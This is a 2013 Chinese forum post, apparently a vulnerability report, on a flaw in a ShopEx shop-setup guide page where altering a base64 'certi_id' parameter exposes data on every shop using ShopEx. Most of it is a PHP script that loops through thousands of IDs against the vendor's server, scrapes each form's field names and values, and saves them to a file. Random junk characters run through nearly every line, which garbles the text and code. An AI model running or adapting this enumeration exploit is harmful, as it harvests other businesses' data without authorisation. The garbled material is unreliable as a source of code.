|
|
简要描述:
/ S' s- ]1 I3 ]$ z# o7 i! vShopEx某接口缺陷,可遍历所有网站9 s$ L- f# n9 x/ M4 b
详细说明:. p/ }6 r' ~( V: _' M& r* x0 s3 h
问题出现在shopex 网店使用向导页面 + `/ a9 |9 `0 K& G8 ~. n
. l- Y) {1 [ D, B( z# Q
7 `3 }0 X# B* T/ N4 l" Y! k
' D9 m5 S( o0 F$ ]3 ]http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
: Q+ W, b3 }7 M$ U! V6 q2 O5 W3 s9 k* t
6 M7 ]& B" |; q/ V S: |
- D6 ~' i3 W g: c) V) drefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
, `* R# G4 W- q, O8 s" r3 S: n1 h& L0 u9 Y% y; p
2 }0 L, d9 U- d5 A! O, ~; `
' w n8 J/ }4 e Q2 V, N/ r
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 % `5 e8 r. U7 q4 D
) }3 f7 k8 C+ m
6 `) u5 M/ S' |% c% ]) E7 c" G/ ]8 q
<?php
1 y; q) H% s+ {- U( `/ l# F# X0 l) b( d. P& f
for ($i=1; $i < 10000; $i++) { //遍历
, s" S. b3 I1 t8 ]
! i" U' Z: o; \- D% w ShowshopExD($i);
9 g3 ?$ i3 `; Q+ r8 N" u4 n( [) j6 ], ~5 l0 G0 E; [& z$ V1 D6 Z A. X
}2 Q2 O8 b+ x! M6 {# X. Q. U
1 L; |/ ^# r& X function ShowshopExD($cid) {
' R' Y2 t' p% r: @- P) D4 Y( Z0 f1 \- m$ z$ |
$url='http://guide.ecos.shopex.cn/step2.php';
9 W/ f# L% S `5 {; e) U
* U: W6 w3 k! S" E' I8 a $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
1 q3 r* m: R I9 c' f, J
' V1 b: n4 \- Z0 U2 r5 x $url = $url.'?refer='.$refer;/ o+ F" i, S4 a8 [
; z4 x" M. J/ Q- C5 L
$ch = curl_init($url);% C# w$ j9 H6 T6 [4 Y) w. g! |
9 P8 N+ u9 F2 t' S- M- r: [
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;& t4 X+ _+ l. R& J
# q+ P5 f7 S; K
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
# j n9 D9 d* \
5 P0 A2 B3 p) F3 G $result = curl_exec($ch);% E2 x" u% a/ M, A1 K
) I, b2 }$ q; x% F/ S: k- k4 v$ M $result = mb_convert_encoding($result, "gb2312", "UTF-8");
0 C3 H) |+ R) ]5 G* k) k. O. i
: ~* M: m1 L* P5 w W8 V5 _7 [ if(strpos($result,$refer))
. ^* B6 _9 W: m+ X6 Y8 O9 A3 F$ i- [8 U1 `. F8 m0 _+ u! P6 K
{
! w/ P3 p! ~/ J& X7 i( _
, f+ w5 B* s$ t8 e0 L1 m6 X $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
0 N1 d) K( r) X9 Y" O* p: `" V
# c$ d S, W9 z% \/ H* l& j preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);5 Y ]2 }! U( W# c# i
" g+ G1 x1 T6 A3 S) ~/ n8 S$ C foreach ($value[1] as $key) {
/ H* t( B4 a; ~# O$ S8 U0 |6 ]
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);0 @& K9 K! p1 O) u
, s+ X7 d$ F$ y9 X# [5 | echo $res[1][0].':'.$res[3][0]."\r\n";
0 F- t: n5 x; R# F) h H' A6 _" L1 r7 g! j7 C8 R& W
$col =$res[1][0].':'.$res[3][0]."\r\n";
9 d6 A5 C8 t) Z' s: j/ X; ~) J# v3 x& o1 K% R- N5 ^. ~
fwrite($fp, $col, strlen($col)); ( n' d3 Y1 y: f e1 w, K% ^
. ?9 A' R( g2 B7 ^% h q' @! f
}1 e2 M; Y5 ]& n+ b
. y; n- C9 Q# D echo '--------------------------------'."\r\n";
. v4 b- E9 V" v" `5 F0 N) \; N6 @, V, p
fclose($fp);
: J1 e' s5 }$ `# y$ _5 X. o: K
. _/ O5 j: Y# K } q- V8 d0 q8 c! c0 a7 b
# j- E% h# n2 t7 h
flush();
: B' O+ Q6 ]0 u" |' Y. @
8 S. q# B2 H+ t7 {. u3 w curl_close($ch);! ~9 M; h$ u) r; {* t
% |0 q7 F' N: a$ c! u4 a }
* ~: a8 c" l! h$ R' `8 E
# v" G% @) c& M% E" G) M0 u o) r?>" R5 ?5 S3 f: N* _' t& [
漏洞证明:: _: k6 J$ d4 E, W6 E# q
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg) {. N1 o2 k: W& C. F/ A9 F
refer换成其他加密方式$ M* q3 Z$ j+ l
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对